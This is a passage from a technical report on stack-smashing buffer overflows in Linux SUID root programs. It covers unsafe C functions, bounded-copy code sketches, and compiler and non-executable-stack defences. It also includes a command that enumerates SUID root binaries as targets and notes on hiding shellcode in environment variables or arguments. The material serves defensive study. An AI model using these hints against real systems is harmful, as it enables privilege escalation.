additional approach, when small programs with memory restrictions are exploited,
is to store the shell code in an environment variable.
SUID root programs by distribution
In order to search standard Linux distributions for SUID root programs, the
following command can be executed by the privileged user:
/usr/bin/find / -user root -perm -004000 -print
This command is a system-wide search for SUID root files, which,
as described, are crucial in constructing stack smashing exploits. On a Linux
machine running the 2.0.30 kernel, built from a modified version of the
Slackware distribution, 56 SUID root world-executable binaries existed on the
system. A subtle byte copying error in any one of these programs could
allow for a stack smashing vulnerability. Comparatively, in a distribution of
the Solaris operating system, approximately 67 SUID root world-executable
programs existed on the system in total [12]. As with the Linux distribution, an error
in the code that handles dynamic string variables in any one of these system
binaries could allow for a stack smashing vulnerability. Using Linux and Solaris
as examples, one may conclude that a significant number of SUID root
binaries exist in the typical Linux distribution. Any one of these programs
can become a target for stack smashers; thus, protection of
these files is a necessity.
Chapter 5. Prevention and Security
Finding Buffer Overflows
As stated earlier, buffer overflows are the result of stuffing more information
into a buffer than it is meant to hold. Since C does not have any built-in
bounds checking, overflows often manifest themselves as writing past the
end of a character array. The standard C library provides a number of functions
for copying or appending strings that perform no boundary checking.
They include strcat(), strcpy(), sprintf(), and vsprintf(). These functions
operate on null-terminated strings and do not check for overflow of the
receiving string. gets() is a function that reads a line from stdin into a
buffer until it reaches either a terminating newline or EOF. It performs no
checks for buffer overflows. The scanf() family of functions can also be a
problem if you are matching a sequence of non-white-space characters (%s), or
matching a non-empty sequence of characters from a specified set (%[]), the
array pointed to by the char pointer is not large enough to accept the whole
sequence of characters, and you have not defined the optional maximum field
width.
If the target of any of these functions is a buffer of static size, and its other
argument was somehow derived from user input, there is a good possibility
that you might be able to exploit a buffer overflow. Another common programming
construct is the use of a while loop to read one character at a
time into a buffer from stdin or some file until the end of line, end of file, or
some other delimiter is reached. This type of construct usually uses one of
these functions: getc(), fgetc(), or getchar(). If there are no explicit checks for
overflows in the while loop, such programs are easily exploited.
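For contrast, the character-at-a-time loop described above can carry an
explicit bounds check on every store. The following is a minimal sketch; the
function name read_line_bounded is made up for this example.

```c
#include <stdio.h>
#include <stddef.h>

/* Reads one line from `in` into `buf`, storing at most size-1 characters
 * and always NUL-terminating. Characters that do not fit are read and
 * discarded so the next call starts on a fresh line. Returns the number of
 * characters stored, or -1 if size is 0 or EOF is hit before any input. */
long read_line_bounded(FILE *in, char *buf, size_t size)
{
    size_t used = 0;
    int saw_input = 0;
    int c;

    if (size == 0)
        return -1;

    while ((c = fgetc(in)) != EOF && c != '\n') {
        saw_input = 1;
        if (used < size - 1)          /* explicit check before each store */
            buf[used++] = (char)c;
    }
    buf[used] = '\0';

    if (c == EOF && !saw_input)
        return -1;
    return (long)used;
}
```

The same idea applies to the scanf() family: for a 16-byte array, a
conversion such as %15s supplies the maximum field width that a bare %s
lacks.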
To conclude, grep(1) is your friend. The sources for free operating systems and
their utilities are readily available. This fact becomes quite interesting once
you realize that many commercial operating system utilities were derived
from the same sources as the free ones.
Stack Smashing Prevention
A centralized or decentralized approach can be taken to avoid stack smashing
security vulnerabilities. To do so, changes must be implemented in the
privileged programs themselves, in the C programming language compilers,
or in the operating system kernel. A centralized approach involves modification
of system libraries and/or an operating system kernel while a decentralized
approach involves the modification of privileged programs and/or C
programming language compilers. Of these two basic approaches, a decentralized
approach is more immediately expensive with respect to manpower
and workload, but cheaper in the long term, providing a stable, long-lasting
solution. A centralized approach is cheaper in the short term with respect
to manpower and workload, but is nearly impossible to implement as a
long-term solution.
Program modification
To effectively fix a defective SUID root program, a number of modifications can
be made to the program's source code to avoid stack smashing vulnerabilities.
Standard C byte copy or concatenation functions are crucial in
most buffer overflow exploits. A list of vulnerable function calls in the C
programming language, each with a suitable replacement function (if
available), is as follows:
function      suitable replacement
gets()        fgets()
sprintf()
strcat()      strncat()
strcpy()      strncpy()
streadd()
strecpy()
strtrns()
index()
fscanf()
scanf()
sscanf()
vsprintf()
realpath()
getopt()
getpass()
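The replacements in the list are not quite drop-in: strncpy() does not write
a terminator when the source fills the whole count, and the count passed to
strncat() is the number of characters to append, not the size of the buffer.
The wrappers below are a hedged sketch of how the two calls might be used;
the names copy_bounded and append_bounded are invented for this example.

```c
#include <string.h>
#include <stddef.h>

/* Copies src into dst (capacity dst_size), truncating if necessary.
 * The terminator is stored explicitly because strncpy() omits it when src
 * is too long. Returns 0 on a complete copy, 1 if the copy was truncated,
 * and -1 if dst_size is 0. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0)
        return -1;
    strncpy(dst, src, dst_size - 1);
    dst[dst_size - 1] = '\0';
    return strlen(src) >= dst_size ? 1 : 0;
}

/* Appends src to the NUL-terminated string already in dst (capacity
 * dst_size). Returns 0 if everything fit, 1 if truncated, and -1 if dst
 * holds no terminator within dst_size bytes. */
int append_bounded(char *dst, size_t dst_size, const char *src)
{
    const char *end = memchr(dst, '\0', dst_size);
    size_t used, room;

    if (end == NULL)
        return -1;
    used = (size_t)(end - dst);
    room = dst_size - used - 1;       /* space left, excluding the NUL */
    strncat(dst, src, room);          /* appends at most room chars + NUL */
    return strlen(src) > room ? 1 : 0;
}
```

Reporting truncation through the return value lets a privileged program
reject over-long input instead of silently working with a shortened string.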
In general, functions that return a pointer to a result in static storage can be
used in stack smashing exploits. In other words, standard C function calls
that copy strings without checking their length are insecure. Some vulnerable
functions have suitable 'drop in' replacements; others do not. Whenever
possible, alternative functions must be used to help ensure that privileged
code is not susceptible to stack smashing exploits. In addition to using suitable
replacements for vulnerable functions, shell environment pointers and
excessive command line arguments also need to be checked for invalid data.
Recall that stack smashers are creative and often hide shell code and other
crucial exploit information in excessive command line arguments or environment
variables.
Thus, securing source code must be a comprehensive process to be effective,
and all avenues of unauthorized input must be inspected and properly
terminated if invalid.
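One way to inspect environment variables and command line arguments before
use is sketched below. The policy shown (a length limit plus printable ASCII
only) is an assumption chosen for illustration, not a rule from the text, and
both function names are hypothetical.

```c
#include <stdlib.h>
#include <stddef.h>

/* Returns 1 if s is non-NULL, is terminated within max_len bytes, and
 * contains only printable ASCII characters; returns 0 otherwise. The scan
 * never reads more than max_len bytes. */
int input_is_acceptable(const char *s, size_t max_len)
{
    size_t i;

    if (s == NULL)
        return 0;
    for (i = 0; i < max_len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '\0')
            return 1;                 /* terminated within the limit */
        if (c < 0x20 || c > 0x7e)
            return 0;                 /* control or non-ASCII byte */
    }
    return 0;                         /* too long */
}

/* Fetches an environment variable only if it passes the check above;
 * returns NULL when the variable is unset or rejected. */
const char *getenv_checked(const char *name, size_t max_len)
{
    const char *value = getenv(name);

    return input_is_acceptable(value, max_len) ? value : NULL;
}
```

The same predicate can be applied to each argv[] entry at the top of main()
before any copying takes place.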
Commercial programs such as CenterLine Software's Code Center or Pure
Atria's Purify, and noncommercial programs such as Brian Marick's GCT or
Bruce Perens's ElectricFence, can be used to assist programmers in locating
buffer overflows and illegal function operations that standard C compilers
do not look for. However, programs such as these can only catch overflow
bugs reactively, not proactively: a test case must exist which provokes the
stack smashing hole. Many of these programs can also offer more
information than standard Linux facilities while investigating a program's
abnormal memory operations.
As C debugging tools, these programs may offer more than simple 'segmentation
violation' messages. However, it is important to remember that these
programs are designed to remove bugs and do not specialize in security. Furthermore,
these programs do not consider the current or future filesystem
permissions of the program. The same battery of tests is submitted to a
program whether it runs as a privileged user or not.
In summary, automated debugging tools are useful in correcting known vulnerabilities;
however, they cannot detect future vulnerabilities and are limited
as security tools. Security and stability are synonymous. Programs that
use secure functions and accept less bad input data are not only more secure,
but run more efficiently and build faster. By changing existing code
and writing new code with security in mind, both privileged code and nonprivileged
code share the benefits. Recalling the ease with which privileged program
execution can be transferred, it is important to note that privileged
code often trusts nonprivileged code. Privileged processes may assume that
all binaries, privileged and nonprivileged, are to be trusted.
By using more secure programming practices on all Linux system code, every
segment of the code base is strengthened. Security and robustness both
involve thinking about the ranges of allowable inputs and responses, and
limiting them so undesirable responses are not produced.
Modifying the code is the only nearly foolproof method of ensuring that SUID
root programs are not exploited. Not only can this avoid buffer overflows in
programs, but it also yields faster, more efficient, more robust code in
nonsecurity areas of the operating system. The OpenBSD project has paid
special attention to this.
The disadvantage of manually modifying all affected programs is obvious,
since all subject programs must be checked by hand and recompiled. Thousands
of lines of source code must have all function calls and UID execution
privileges examined and changed, if necessary. In the free operating system
arena, systems such as Linux, FreeBSD, OpenBSD and NetBSD have full
source code distributions available for public use. Complete copies of the operating
system kernel and system utilities may be downloaded and modified,
allowing anyone to fix stack smashing vulnerabilities.
In contrast, commercial Linux operating systems
have limited, if any, source code availability. As the chief decentralized approach
to avoiding stack smashing holes in the Linux operating system,
global code auditing is the most expensive in terms of necessary manpower
and workload but can offer the most in long-term reliability and security.
Compiler modifications
An additional decentralized approach to preventing stack smashing vulnerabilities
is to modify how the C language compiler in a given Linux
operating system handles vulnerable functions. However, it is important
to note that, in most cases, these modifications
are not trivial and involve fundamental changes to the concepts
behind the C programming language.
A simple approach of this nature involves modifications to the C compiler
which do not affect the C programming language. For example, the BSDI and
OpenBSD operating systems' compilers generate warning messages when
compiling a program which uses dangerous function calls. Although a warning
alone does not prevent an overflow, the main benefit of this approach is that it
encourages secure programming without changing the code or its performance.
A median approach of this nature involves slight modifications to the compiler,
such as those that would modify only the dangerous functions in the C
library to perform a stack integrity check before referencing the appropriate
return address. In one proposed patch to the FreeBSD operating system, if
the integrity check fails, the function simply prints a warning message and exits
the affected program.
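The idea of an integrity check can be modelled in portable C with a guard
word placed after a buffer. This is a simplified sketch and not the FreeBSD
patch itself: the struct, the guard value, and the function names are all
assumptions made for illustration, and a real check would inspect the actual
stack frame.

```c
#include <stddef.h>
#include <string.h>

#define GUARD_VALUE 0xDEADC0DEUL   /* arbitrary marker chosen for this sketch */

struct guarded_frame {
    char          buf[16];  /* the buffer an unchecked copy writes into */
    unsigned long guard;    /* stands in for the word checked before return */
};

void frame_init(struct guarded_frame *f)
{
    memset(f, 0, sizeof *f);
    f->guard = GUARD_VALUE;
}

/* Models an unchecked byte copy that starts at buf and may run on into the
 * guard. The write goes through a pointer to the whole struct and is
 * clamped to sizeof *f so that the sketch itself stays well defined. */
void frame_unchecked_copy(struct guarded_frame *f, const void *src, size_t n)
{
    if (n > sizeof *f)
        n = sizeof *f;
    memcpy((unsigned char *)f, src, n);
}

/* The integrity check: returns 1 if the guard is untouched, 0 otherwise. */
int frame_is_intact(const struct guarded_frame *f)
{
    return f->guard == GUARD_VALUE;
}
```

In the scheme described above, a failed check would be followed by a warning
message and program exit rather than a return through the damaged frame.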
The main disadvantage to this approach is that all dangerous functions
would suffer a significant performance penalty, and like the previous approach,
this modification does not take into account autonomous functions
defined by the programmer, because of its implementation in the system libraries.
An additional drawback to this approach is that the code necessary
for checking the stack must be written in assembler, and is thus not portable
to multiple architectures.
An extreme approach to solving the problem with the compiler involves implementing
bounds checking in the C programming language. This is possibly the
most dangerous solution to the stack smashing problem, as it
violates the C programming language's simplicity, efficiency, and flexibility.
One approach used in implementing this involves modifying the representation
of pointers in the language to include three items: the pointer
itself, and the lower and upper bounds of the pointer's address space.
By giving the compiler the additional upper and lower bound information,
it would then be trivial to do bounds checking before byte copy functions.
Despite this benefit, using this approach to implementing bounds checking
has the following disadvantages: execution time of resulting code increases
by a factor of ten or more[5], register allocation becomes more expensive by
a factor of 3:1, new versions of all compiled system libraries and system calls
must be provided, and code that interfaces with the hardware directly may
be completely incompatible or require special attention.
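The three-item pointer representation can be imitated by hand in ordinary C
to show what the compiler would have to carry around. This is a sketch under
that assumption; struct bounded_ptr and its helpers are hypothetical names,
not part of any real compiler.

```c
#include <stddef.h>

/* A pointer together with the bounds of the region it may address. */
struct bounded_ptr {
    char *ptr;    /* current position */
    char *lower;  /* first valid byte */
    char *upper;  /* one past the last valid byte */
};

struct bounded_ptr bp_make(char *base, size_t size)
{
    struct bounded_ptr bp = { base, base, base + size };
    return bp;
}

/* Stores value at ptr[offset]. Returns 0 on success and -1 if the target
 * lies outside [lower, upper). The test is done on offsets so that no
 * out-of-range pointer is ever formed. */
int bp_store(struct bounded_ptr bp, ptrdiff_t offset, char value)
{
    ptrdiff_t pos  = bp.ptr - bp.lower;     /* index of ptr in the region */
    ptrdiff_t size = bp.upper - bp.lower;   /* length of the region */

    if (offset < -pos || offset >= size - pos)
        return -1;
    bp.ptr[offset] = value;
    return 0;
}
```

Every pointer now occupies three machine words and every store performs two
comparisons, which gives some feel for where the costs listed above come
from.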
A unique approach to modifying the compiler in this manner involves modifying
the compiler to perform the same type of bounds checking without
modifying the representation of pointers. Furthermore, there are options
to turn the bounds checking mode on or off in a given program.
Only one pointer is valid for a given region, and one can check whether a
pointer arithmetic expression is valid by finding its base pointer's storage
region. The result is then checked again to ensure that it points to
the same storage region.
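A rough model of this scheme keeps a table of known storage regions and
validates pointer arithmetic against it, leaving the pointers themselves
unchanged. The fixed-size table and the function names below are assumptions
for illustration; a real implementation would register regions automatically
and use a faster lookup.

```c
#include <stddef.h>
#include <stdint.h>

struct region {
    uintptr_t base;   /* address of the first byte */
    size_t    size;   /* length in bytes */
};

#define MAX_REGIONS 16
static struct region region_table[MAX_REGIONS];
static size_t region_count;

/* Records a storage region; returns -1 when the table is full. */
int region_register(const void *base, size_t size)
{
    if (region_count == MAX_REGIONS)
        return -1;
    region_table[region_count].base = (uintptr_t)base;
    region_table[region_count].size = size;
    region_count++;
    return 0;
}

/* Finds the region that contains addr, or NULL if there is none. */
static const struct region *region_find(uintptr_t addr)
{
    size_t i;

    for (i = 0; i < region_count; i++) {
        if (addr >= region_table[i].base &&
            addr - region_table[i].base < region_table[i].size)
            return &region_table[i];
    }
    return NULL;
}

/* Returns 1 if ptr + delta stays inside the region that ptr belongs to
 * (one past the end is allowed, as in C), and 0 otherwise. */
int arith_is_valid(const void *ptr, ptrdiff_t delta)
{
    uintptr_t addr = (uintptr_t)ptr;
    const struct region *r = region_find(addr);
    ptrdiff_t offset;

    if (r == NULL)
        return 0;
    offset = (ptrdiff_t)(addr - r->base) + delta;
    return offset >= 0 && (size_t)offset <= r->size;
}
```

Because ordinary pointers are kept, code compiled without the checks can
still exchange pointers with checked code, which is what makes an on/off
switch per program feasible.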
Despite semifavorable performance statistics, and in addition to the general risk
involved in modifying the C language at this level, this modification involves
patching and recompiling the existing C compiler and its libraries. Furthermore,
all previously compiled binaries must be deleted and recompiled with
the new libraries. Once this is done, all binaries on the system will execute
with respect to this patch. In conclusion, modifying the C language or the C
compiler to limit stack smashing opportunities often involves modifying the
C language at a nontrivial level.
Additionally, the most complex and comprehensive solutions of this nature,
despite their long term centralization, still remain largely decentralized and
difficult to implement and test in a reasonable amount of time. The more
trivial modifications of this nature degenerate simply into compiler warning
messages that can only encourage the programmer to modify the program
manually.
CPU/OS kernel stack execution privilege
The most centralized approach to preventing some stack smashing vulnerabilities
involves modifying an operating system's kernel segment limit such
that it does not cover the actual stack space. This approach effectively removes
the kernel's stack execution permission. This has a fundamental advantage
over other countermeasures: as the most centralized method of
limiting stack smashing vulnerabilities, it requires no recompilation of C
libraries or the actual compiler; only the operating system kernel
need be recompiled. A practical implementation of this concept on the Linux
operating system is described below; this description touches on the details
of implementation as well as some of the problems.
To remove stack execution privilege in Linux, the operating system's
dynamically allocated stack is marked as nonexecutable. Any program
started under such a kernel would have its stack pages also marked
nonexecutable. Stack smashing exploits depend on an executable stack when
returning back into a memory address which executes an interactive shell.
By removing this functionality from the system, some stack smashing vulnerabilities
can be stopped.
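On Linux systems that expose /proc/self/maps and label the stack mapping as
[stack], a process can observe whether its own stack pages carry execute
permission. The sketch below only reads that permission; it does not change
it, and the function names are hypothetical. Each line of the file has the
fields: address range, permissions, offset, device, inode, pathname.

```c
#include <stdio.h>
#include <string.h>

/* Examines one line of /proc/<pid>/maps. Returns 1 if the line describes
 * the [stack] mapping with execute permission, 0 if it describes the
 * [stack] mapping without it, and -1 for any other line. */
int stack_line_is_executable(const char *line)
{
    char perms[5];

    if (strstr(line, "[stack]") == NULL)
        return -1;
    /* Skip the address range, then read the 4-character permission field. */
    if (sscanf(line, "%*s %4s", perms) != 1)
        return -1;
    return strchr(perms, 'x') != NULL;
}

/* Scans this process's own mappings. Returns 1 or 0 as above, or -1 if
 * the file cannot be read or no [stack] line is found. */
int own_stack_is_executable(void)
{
    char line[512];
    int result = -1;
    FILE *maps = fopen("/proc/self/maps", "r");

    if (maps == NULL)
        return -1;
    while (fgets(line, sizeof line, maps) != NULL) {
        int r = stack_line_is_executable(line);
        if (r != -1) {
            result = r;
            break;
        }
    }
    fclose(maps);
    return result;
}
```

A permission field of rw-p on the [stack] line means that code placed on the
stack cannot be executed directly, which is the condition the kernel
modification aims for.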
Furthermore, signal handler returns in the Linux operating system require
an executable stack. Signal handlers are absolutely crucial in an operating
system, so a temporarily executable stack for signal handlers must be implemented.
Consequently, buffer overflows in signal handlers would still be possible
using this temporarily executable stack.
Changing the kernel stack execution permissions would stop most
SUID buffer overflows, excluding those involving signal handlers. A system
with a nonexecutable stack also hinders LISP and Objective C development
efforts, and other functional languages might also be affected. Furthermore,
every program contains code that performs fundamental operations
such as saving and restoring values from CPU registers and performing system
calls. An exploit could transfer control to this existing code rather than to
code placed on the stack.
In contrast to the stack smashing exploits currently available, an attack
such as this would be impossible to prevent by changing the stack execution
privilege. In other words, removing the stack execution permission only
prevents today's stack smashing exploits from working properly. As exploits
become more sophisticated, stack execution bits may have little or no relevance
in terms of the exploit. As an aside, this type of patch can also be
implemented in system CPU hardware.
New system architectures could simply have multiple stacks: one for call
frames, and one for automatic storage. In conclusion, by removing stack execution
from the system kernel, one can attempt to stop the stack smashing
problem at the source. However, this approach suffers in implementation because
the necessary code is nonportable, and standard compiler functions and
operating system signal handling behavior are modified and may be unpredictable.
In addition to these points, this approach is not proven to stop
more sophisticated stack smashing exploits.
Chapter 6. Conclusion
Stack smashing security exploits have become commonplace on Linux machines
as a means to gain access to privileged resources. Based on this study, one can
see how, by combining standard operations and conditions of the Linux
operating system and the C programming language, an unprivileged user can
obtain privileged user permissions. Furthermore, given the number of
privileged programs that exist in today's standard Linux distributions, an
overflow exploit could be constructed for any one or a number of
these operating systems.
In spite of the prevalence of stack smashing, a number of things can be done to
prevent most stack smashing vulnerabilities. As the level of awareness of stack
smashing exploits increases, Linux vendors, programmers, system administrators,
and users alike are educating each other. System administrators can
implement various configuration methods to lower the possibilities of stack
smashing vulnerability exploits. Linux vendors can do their part by making a
commitment to be very cautious with privileged binaries installed by default
on their specific Linux distribution.
Lastly, perhaps the most effective solution can come from programmers
who write privileged code. As standards evolve and are accepted for coding
safer privileged programs and creating more secure operating systems, programmers
can develop more robust code which is less susceptible to stack
smashing. With the cooperation of many people in different parts of the Linux
community, stack smashing security vulnerabilities can be defeated.
